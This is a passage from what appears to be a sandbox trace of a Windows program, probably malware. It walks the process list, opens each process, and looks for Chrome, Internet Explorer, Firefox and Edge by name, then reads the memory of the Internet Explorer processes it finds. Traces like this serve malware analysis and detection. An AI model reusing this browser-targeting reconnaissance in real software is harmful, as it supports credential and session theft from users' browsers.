	[0248.693] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0248.694] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x9ca0
	[0248.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.694] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0248.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.694] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.695] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0248.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.695] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.695] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0248.697] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x9ca4
	[0248.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.697] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0248.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.697] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.698] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0248.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.699] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.699] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0248.700] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x9ca8
	[0248.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.700] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0248.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.700] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.701] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0248.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.701] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.702] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0248.702] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x9cac
	[0248.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.703] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0248.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.703] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.704] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0248.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.704] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.705] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0248.706] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x9cb0
	[0248.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.706] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0248.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.706] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.707] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0248.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.707] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.708] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0248.709] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x9cb4
	[0248.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.709] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0248.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.709] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0248.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.709] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0248.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.710] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.710] NtQueryInformationProcess (in: ProcessHandle=0x9cb4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0248.710] ReadProcessMemory (in: hProcess=0x9cb4, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0248.710] ReadProcessMemory (in: hProcess=0x9cb4, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0248.710] ReadProcessMemory (in: hProcess=0x9cb4, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0248.710] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0248.711] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0248.712] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x9cb8
	[0248.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.712] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0248.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.712] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0248.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.712] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0248.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.713] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.713] NtQueryInformationProcess (in: ProcessHandle=0x9cb8, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0248.713] ReadProcessMemory (in: hProcess=0x9cb8, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0248.713] ReadProcessMemory (in: hProcess=0x9cb8, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0248.713] ReadProcessMemory (in: hProcess=0x9cb8, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0248.713] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0248.714] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0248.714] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x9cbc
	[0248.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.715] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0248.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.715] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.715] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0248.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.715] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.716] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0248.716] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x9cc0
	[0248.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.717] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0248.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.717] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.717] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0248.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.718] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.718] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.719] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x9cc4
	[0248.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.719] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.719] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.719] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.720] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.720] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.721] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.721] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x9cc8
	[0248.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.722] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.722] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.722] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.723] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.723] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.723] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x9ccc
	[0248.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.724] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.724] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.724] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.725] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.725] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0248.725] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x9cd0
	[0248.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.726] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0248.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.726] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.726] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0248.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.727] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.727] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.728] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x9cd4
	[0248.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.728] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.728] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.729] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.729] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.729] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.729] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.729] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.730] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x9cd8
	[0248.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.730] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.730] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.731] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.731] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.731] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0248.732] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0x9cdc
	[0248.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.732] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0248.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.732] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.733] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0248.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.733] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.733] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0248.734] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0x9ce0
	[0248.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.734] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.734] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.735] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.735] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.735] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0248.736] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0x9ce4
	[0248.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.736] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0248.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.736] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.737] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0248.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.737] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.737] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.738] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0x9ce8
	[0248.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.738] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.738] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.739] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.739] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.739] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0248.740] CloseHandle (hObject=0x4fd0) returned 1
	[0248.740] Sleep (dwMilliseconds=0x64) 
	[0248.837] GetCurrentProcessId () returned 0x110
	[0248.837] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0248.843] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0248.845] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0248.846] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0248.847] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x9cec
	[0248.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.847] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0248.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.848] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.848] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0248.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.848] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.848] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0248.849] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x9cf0
	[0248.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.849] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0248.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.850] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.850] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0248.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.850] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.850] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0248.851] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x9cf4
